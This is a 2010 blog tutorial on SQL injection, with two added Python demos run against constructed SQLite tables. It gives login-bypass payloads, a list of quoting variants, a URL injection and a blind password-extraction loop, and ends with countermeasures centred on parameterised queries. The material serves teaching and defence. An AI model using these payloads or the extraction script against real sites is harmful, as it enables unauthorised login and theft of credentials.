Saturday, December 18, 2010

Implementing & Preventing SQL Injection Attacks Tutorial -1

SQL injection is one of the most well-known classes of web application attack; many major identity, credit card and bank data thefts have been carried out through it. It is easy to carry out if you are well versed in SQL syntax. In an SQL injection attack the attacker supplies input that the application pastes straight into its own SQL queries, so the database ends up executing the attacker's SQL and returns sensitive or classified data it should not, such as usernames & passwords, email addresses or credit card numbers.

Check out these links :
http://cyberinsecure.com/citysights-ny-website-breached-110000-memebers-credit-card-details-stolen/
http://cyberinsecure.com/savannah-free-software-collaborative-development-platform-hacked-accounts-compromised-through-sql-injection/
http://cyberinsecure.com/new-mass-injection-attack-adds-rogue-code-to-js-files-rackspace-and-media-temple-affected/

The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

Let's suppose that when a user enters a username & password, the following query is sent to the SQL database (the user input is pasted straight into the query string):
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "' AND `pass` = '" + password + "';"
Now, if we put ' or '1'='1 (or 'OR''=' or hi' or 1=1--) in both userName & password, the WHERE clause is true for every row, and we are logged in as the first user in the users table without knowing any password. For example the first payload produces
SELECT * FROM `users` WHERE `name` = '' or '1'='1' AND `pass` = '' or '1'='1';
and the third one comments out everything after the username.
Generally the attacker first tries to force the application to return an SQL error, in order to confirm that the input reaches the query unescaped. Once you have a username (let's say it is ron) you can work out the password by entering anything as the username and the following as the password:
' OR EXISTS(SELECT * FROM users WHERE name='ron' AND pass LIKE '%w%') AND ''='
You need to know the basics of SQL before trying to understand the above command. What we did: with anything as the username and the payload as the password, the query becomes
SELECT * FROM `users` WHERE `name` = 'anything' AND `pass` = '' OR EXISTS(SELECT * FROM users WHERE name='ron' AND pass LIKE '%w%') AND ''='';
The appended OR branch is true only if ron's password contains a w. %w% is a wildcard pattern: % matches any run of characters, so there can be anything before & after the w, as in asaswdfd or fdgwdfw. _w% means w must be the second character, as in dwbxx (note that LIKE is case-insensitive by default in MySQL and SQLite, so such a probe cannot tell w from W).
The first part, name = 'anything' AND pass = '', is false, so the result depends entirely on the statement after OR. If that statement is true you are granted access; if false you are denied. Repeating the probe with different letters and positions reveals the password one character at a time, even though the application never displays any data: this is called blind SQL injection.
You can understand it from the logical AND/OR gates (AND binds tighter than OR):
0 AND 0 OR 1 = 1
0 AND 0 OR 0 = 0
Observe that the output depends on the last digit. The same thing is happening here.
Similarly, you can further modify & try different queries. What you can build is limited only by your imagination (and the database's SQL dialect).
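The login bypass and the blind EXISTS/LIKE probe above, as an added example that is not part of the original post: a Python script against an in-memory SQLite database with a constructed users table (admin and ron, with made-up passwords). vulnerable_login builds the query exactly the way the post's statement does; bypass_login sends the tautology in both fields; blind_extract_password generalises the single '%w%' probe into a loop that recovers the whole password one character at a time from nothing but the yes/no login result. The table, user names, passwords and function names are all assumptions for the demo.

```python
import sqlite3

# Candidate characters for the blind probe. '%' and '_' are LIKE wildcards
# and are deliberately left out.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def make_db():
    """Constructed demo database: two users with made-up passwords."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT)")
    con.executemany("INSERT INTO users (name, pass) VALUES (?, ?)",
                    [("admin", "t0psecret"), ("ron", "sw0rdfish")])
    return con


def vulnerable_login(con, user_name, password):
    """The post's login query, built by string concatenation (the bug).
    Returns the first matching row, i.e. the user you end up logged in as,
    or None when login fails."""
    statement = ("SELECT * FROM `users` WHERE `name` = '" + user_name +
                 "' AND `pass` = '" + password + "';")
    return con.execute(statement).fetchone()


def bypass_login(con):
    """Tautology in both fields. The WHERE clause becomes
    name = '' OR '1'='1' AND pass = '' OR '1'='1', which is true for every
    row, so the first row of the table (admin) is returned."""
    return vulnerable_login(con, "' OR '1'='1", "' OR '1'='1")


def comment_bypass_login(con):
    """Comment the rest of the query away: name = 'hi' or 1=1--' AND ...
    Works as-is on SQL Server and SQLite; MySQL needs a space after '--'."""
    return vulnerable_login(con, "hi' or 1=1--", "irrelevant")


def oracle(con, target, prefix):
    """One yes/no question: does <target>'s password start with <prefix>?
    This is the post's '%w%' probe with the pattern anchored at the start."""
    payload = ("' OR EXISTS(SELECT * FROM users WHERE name='" + target +
               "' AND pass LIKE '" + prefix + "%') AND ''='")
    # The username is wrong and pass is '', so the whole WHERE clause
    # reduces to the EXISTS branch: a row comes back iff the guess is right.
    return vulnerable_login(con, "anything", payload) is not None


def blind_extract_password(con, target, alphabet=ALPHABET):
    """Recover the password character by character from the oracle.
    LIKE is case-insensitive by default, so the result is lower-case."""
    known = ""
    while True:
        for c in alphabet:
            if oracle(con, target, known + c):
                known += c
                break
        else:                      # no character extends the prefix: done
            return known


if __name__ == "__main__":
    db = make_db()
    print("tautology bypass logs in as:", bypass_login(db)[1])
    print("comment bypass logs in as:", comment_bypass_login(db)[1])
    print("ron's password, extracted blind:", blind_extract_password(db, "ron"))
```

Each oracle call is one login attempt, so against a real site this is slow and noisy (about 36 requests per password character here), which is exactly why login rate limiting and failed-login alerting are worth having even when the injection itself has not been found yet.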

You can even try this in a URL. Suppose the URL is like this -
http://game.com/search.asp?category=sports which is passing the query
SELECT * FROM search WHERE category='sports'  
You can append it like this one -
http://game.com/search.asp?category=sports' or 1=1--
(the browser encodes the spaces as %20 and the quote as %27; the server decodes them before building the query)
which will send the query -
SELECT * FROM search WHERE category='sports' or 1=1--' 
I think you can see what I mean. The -- starts a comment that swallows the rest of the query, including the closing quote; in MySQL the comment marker needs a space after it (-- ), or you can use # instead. Instead of appending ' or 1=1--, you can try other options, depending on how the parameter is quoted inside the query -
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''= 

Countermeasures: The real fix is to never build queries by string concatenation. Use parameterized queries (prepared statements with bound parameters) so that user input is passed to the database as data, not as SQL, and cast numeric parameters to numbers before using them. Filtering out characters like   '    "    -    /    \    ;    NULL, etc. is at best a second line of defence: it does nothing for numeric parameters (no quote is needed to inject into category=1), and a blacklist is easily bypassed by encodings it did not anticipate. Whatever you do, apply it to all strings from:
* Input from users
* Parameters from URL
* Values from cookie (and other HTTP headers)
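The search.asp example and the countermeasures list, as an added example that is not part of the original post: a Python script with a constructed SQLite search table. search_unfiltered_string is the query the post shows and falls to the ' or 1=1-- payload; search_filtered_string applies the post's character filter and does stop that particular payload; search_filtered_numeric applies the same filter to a numeric cat_id parameter, which the filter cannot protect because no quote is needed there; the two parameterised functions show the fix. The table, columns, rows and function names are assumptions for the demo.

```python
import sqlite3

# The characters the post says to filter out.
BLACKLIST = set("'\"-/\\;")


def make_db():
    """Constructed demo table: what http://game.com/search.asp might query."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE search (id INTEGER PRIMARY KEY, category TEXT, "
                "cat_id INTEGER, title TEXT)")
    con.executemany(
        "INSERT INTO search (category, cat_id, title) VALUES (?, ?, ?)",
        [("sports", 1, "football"), ("sports", 1, "cricket"),
         ("news", 2, "election"), ("internal", 3, "unpublished memo")])
    return con


def filtered(value):
    """The post's countermeasure: drop the dangerous characters."""
    return "".join(ch for ch in value if ch not in BLACKLIST)


def search_unfiltered_string(con, category):
    """The query from the post, built straight from the URL parameter.
    category=sports' or 1=1-- returns every row, including the internal one."""
    sql = "SELECT title FROM search WHERE category='" + category + "'"
    return [row[0] for row in con.execute(sql)]


def search_filtered_string(con, category):
    """Same query with the character filter applied. The payload becomes
    category='sports or 1=1', a harmless literal that matches nothing."""
    sql = "SELECT title FROM search WHERE category='" + filtered(category) + "'"
    return [row[0] for row in con.execute(sql)]


def search_filtered_numeric(con, cat_id):
    """Same filter on a numeric parameter. The value is not quoted in the SQL,
    so '1 OR 1=1' contains nothing the filter removes and still injects."""
    sql = "SELECT title FROM search WHERE cat_id=" + filtered(cat_id)
    return [row[0] for row in con.execute(sql)]


def search_parameterised(con, category):
    """The fix: the value is bound as data and can never change the query."""
    return [row[0] for row in
            con.execute("SELECT title FROM search WHERE category=?", (category,))]


def search_parameterised_numeric(con, cat_id):
    """The fix for numeric input: reject anything that is not an integer
    (int() raises ValueError), then bind it."""
    return [row[0] for row in
            con.execute("SELECT title FROM search WHERE cat_id=?", (int(cat_id),))]


if __name__ == "__main__":
    db = make_db()
    print("unfiltered, injected:", search_unfiltered_string(db, "sports' or 1=1--"))
    print("filtered string, injected:", search_filtered_string(db, "sports' or 1=1--"))
    print("filtered numeric, injected:", search_filtered_numeric(db, "1 OR 1=1"))
    print("parameterised, injected:", search_parameterised(db, "sports' or 1=1--"))
    print("parameterised, honest:", search_parameterised(db, "sports"))
```

The parameterised versions also accept a category containing a quote (say O'Neill) that the blacklist would silently mangle, which is the usual sign that a filter is doing the database driver's job badly.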

Note: This is a very basic post, just to create a level of understanding of SQL injection. Textbook cases like these are rarer on well-maintained sites, but SQL injection as a class remains very common.
Visit http://sqlzoo.net & use Google to understand the concept further.
